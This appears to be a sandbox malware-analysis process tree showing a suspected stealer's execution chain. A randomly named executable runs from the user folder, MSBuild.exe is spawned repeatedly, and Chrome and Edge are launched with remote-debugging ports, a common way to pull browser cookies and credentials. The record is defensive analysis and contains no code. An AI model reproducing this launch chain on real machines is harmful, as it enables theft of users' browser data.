        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:1388
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4464,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=4456 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:19800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:8
        12⤵
        
        PID:25944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        11⤵
        Uses browser remote debugging
        
        PID:26228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        12⤵
        Uses browser remote debugging
        
        PID:26244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffebd61f208,0x7ffebd61f214,0x7ffebd61f220
        13⤵
        
        PID:26280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1952,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:3
        13⤵
        
        PID:5068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2744,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=2740 /prefetch:2
        13⤵
        
        PID:25860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2008,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:8
        13⤵
        
        PID:25852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3492,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:10384
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:9380
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:8
        13⤵
        
        PID:7280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4640,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=5684 /prefetch:8
        13⤵
        
        PID:7656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6088,i,8599473741092671580,11175147765640727630,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:8
        13⤵
        
        PID:924
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IJJJEBFHDB.exe"
        11⤵
        
        PID:16316
        
        C:\Users\Admin\IJJJEBFHDB.exe
        
        "C:\Users\Admin\IJJJEBFHDB.exe"
        12⤵
        
        PID:16276
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        13⤵
        
        PID:16248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        13⤵
        
        PID:16236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        14⤵
        Uses browser remote debugging
        
        PID:25172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x140,0x144,0x16c,0x168,0x170,0x7ffecbfcdcf8,0x7ffecbfcdd04,0x7ffecbfcdd10
        15⤵
        
        PID:25160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1964,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=2452 /prefetch:3
        15⤵
        
        PID:24932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2416,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:2
        15⤵
        
        PID:24924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2140,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=2620 /prefetch:8
        15⤵
        
        PID:24900
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=3112 /prefetch:1
        15⤵
        Uses browser remote debugging
        
        PID:24868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=3084 /prefetch:1
        15⤵
        Uses browser remote debugging
        
        PID:24860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4320,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:1
        15⤵
        Uses browser remote debugging
        
        PID:24612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,13955286472300491157,17207205291714817414,262144 --variations-seed-version --mojo-platform-channel-handle=5016 /prefetch:8
        15⤵
        
        PID:20996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        14⤵
        Uses browser remote debugging
        
        PID:20688
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        15⤵
        Uses browser remote debugging
        
        PID:20676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x2f4,0x7ffebd61f208,0x7ffebd61f214,0x7ffebd61f220
        16⤵
        
        PID:20648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=1896,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:3
        16⤵
        
        PID:19724
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2648,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=2620 /prefetch:2
        16⤵
        
        PID:19708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=2164,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:8
        16⤵
        
        PID:19696
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:20448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3504,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:20436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5616,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=5732 /prefetch:8
        16⤵
        
        PID:12128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5588,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=5628 /prefetch:8
        16⤵
        
        PID:12076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6028,i,17688915917257630200,12380186119519980036,262144 --variations-seed-version --mojo-platform-channel-handle=6040 /prefetch:8
        16⤵
        
        PID:7700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        14⤵
        Uses browser remote debugging
        
        PID:17592
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        15⤵
        Uses browser remote debugging
        
        PID:17612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        14⤵
        Uses browser remote debugging
        
        PID:15288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        15⤵
        Uses browser remote debugging
        
        PID:15308
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffecbfaf208,0x7ffecbfaf214,0x7ffecbfaf220
        16⤵
        
        PID:15372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1696,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:2
        16⤵
        
        PID:15684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1984,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:3
        16⤵
        
        PID:15696
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2516,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:8
        16⤵
        
        PID:15836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3420,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:16248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3440,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
        16⤵
        Uses browser remote debugging
        
        PID:16288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4636,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:8
        16⤵
        
        PID:25268
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4956,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=4952 /prefetch:8
        16⤵
        
        PID:25276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5436,i,1691703010255958189,5899370940059336413,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
        16⤵
        
        PID:25320
        
        C:\ProgramData\r9zuk6p8g4.exe
        
        "C:\ProgramData\r9zuk6p8g4.exe"
        14⤵
        
        PID:14348
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:13512
        
        C:\ProgramData\djecbi5fkf.exe
        
        "C:\ProgramData\djecbi5fkf.exe"
        14⤵
        
        PID:20240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:20148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:20140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:20104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        16⤵
        Uses browser remote debugging
        
        PID:17464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffebdf3dcf8,0x7ffebdf3dd04,0x7ffebdf3dd10
        17⤵
        
        PID:14544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=2488 /prefetch:3
        17⤵
        
        PID:3940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2456,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=2452 /prefetch:2
        17⤵
        
        PID:11868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2084,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=2796 /prefetch:8
        17⤵
        
        PID:6384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=3240 /prefetch:1
        17⤵
        Uses browser remote debugging
        
        PID:11800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=3260 /prefetch:1
        17⤵
        Uses browser remote debugging
        
        PID:11540
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3172,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:1
        17⤵
        Uses browser remote debugging
        
        PID:4632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5008,i,14960871782547134792,9351621038158422771,262144 --variations-seed-version --mojo-platform-channel-handle=4720 /prefetch:8
        17⤵
        
        PID:14956
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        16⤵
        Uses browser remote debugging
        
        PID:21220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        17⤵
        Uses browser remote debugging
        
        PID:21216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffecbfaf208,0x7ffecbfaf214,0x7ffecbfaf220
        18⤵
        
        PID:21180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
